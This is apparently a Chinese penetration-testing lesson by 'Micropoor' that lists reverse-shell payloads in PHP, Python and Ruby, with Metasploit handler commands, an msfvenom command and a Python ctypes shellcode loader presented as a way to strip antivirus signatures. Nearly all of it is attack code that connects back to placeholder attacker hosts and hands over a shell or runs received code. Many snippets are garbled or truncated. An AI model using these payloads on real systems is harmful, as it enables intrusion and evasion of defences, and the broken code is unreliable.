基于第十课补充 Payload 1

在实战中可能会遇到各种诉求 payload,并且可能遇到各种实际问题,如杀毒软件,防火墙拦截,特定端口通道,隧道等问题。这里我们根据第十课补充其中部分,其他内容后续补充。

这次主要补充了 PHP,python,ruby。

ps:在线代码高亮:http://tool.oschina.net/highlight

1、php-payload

  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4. msf exploit(handler) > set LHOST 192.168.1.107
  5. LHOST => 192.168.1.107
  1. <?
  2. php error_reporting(0 $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) {
  3. {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_
  4. strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s;
  5. $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s
  6. >

第十四课:基于第十课补充payload1 - 图1

  1. <?php
  2. $sock=fsockopen("xx.xx.xx.xx",xxexec("/bin/sh -i <&3 >&3 2>&3"
  3. ?>

第十四课:基于第十课补充payload1 - 图2

2、python-payload

  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4. msf exploit(handler) > set LHOST 192.168.1.107
  5. LHOST => 192.168.1.107
  1. import socket,struct,time
  2. for x in range(10):
  3.     try:
  4.         s=socket.socket(2,socket.SOCK_STREAM)
  5.         s.connect(('x.x.x.x',xx))
  6.         break
  7.     except:
  8.         time.sleep(5) l=struct.unpack('>I',s.recv(4))[0]
  9. d=s.recv(l)
  10. while len(d)<l:
  11.     d+=s.recv(l-len(d))
  12. exec(d,{'s':s})

第十四课:基于第十课补充payload1 - 图3

  1. import socket,subprocess,os;
  2. s=socket.socket(socket.AF_INET,socket.SOCK_STREAMs.connect(("xx.xx.xx.xx",xx));
  3. i"]);

第十四课:基于第十课补充payload1 - 图4

  1. import socket import subprocess
  2. s=socket.socket()
  3. s.connect(("xx.xx.xx.xx",xx))
  4. while 1:
  5.   p = subprocess.Popen(s.recv(1024),
  6.                       shell=True,
  7.                       stdout=subprocess.PIPE,
  8.                       stderr=subprocess.PIPE,
  9.                       stdin=subprocess.send(p.stdout.read() + p.stderr.read()
  10.                       )

第十四课:基于第十课补充payload1 - 图5

删除特征:

  1. root@John:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 LPORT=88 -f c | tr -d '"' | tr -d '\n'

第十四课:基于第十课补充payload1 - 图6

  1. from ctypes import *
  3. reverse_shell = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72
  4. micropoorshell = create_string_buffer(reverse_shell, len(reverse_shell))
  5. shellcode = cast(micropoorshell, CFUNCTYPE(c_void_p))
  6. shellcode()

2、ruby-payload

  1. require 'socket';c=TCPSocket.new("xx.xx.xx.xx", x$stdin.reopen(c$stdout.reopen(c$stderr.reopen(c$stdi
  2. (IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil}

第十四课:基于第十课补充payload1 - 图7

  1. require 'socket';f=TCPSocket.open("xx.xx.xx.xx",xx).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

第十四课:基于第十课补充payload1 - 图8

  1. require 'socket';c=TCPSocket.new("xx.xx.xx.xx","xx"while(cmd=c.getsIO.popen(cmd,"r"){|io|c.print io.read}end

第十四课:基于第十课补充payload1 - 图9

  1. c=TCPSocket.new("xx.xx.xx.xx","xx"while(cmd=c.getsIO.popen(cmd,"r"){\|io\|c.print
  2. io.read}end

第十四课:基于第十课补充payload1 - 图10

—By Micropoor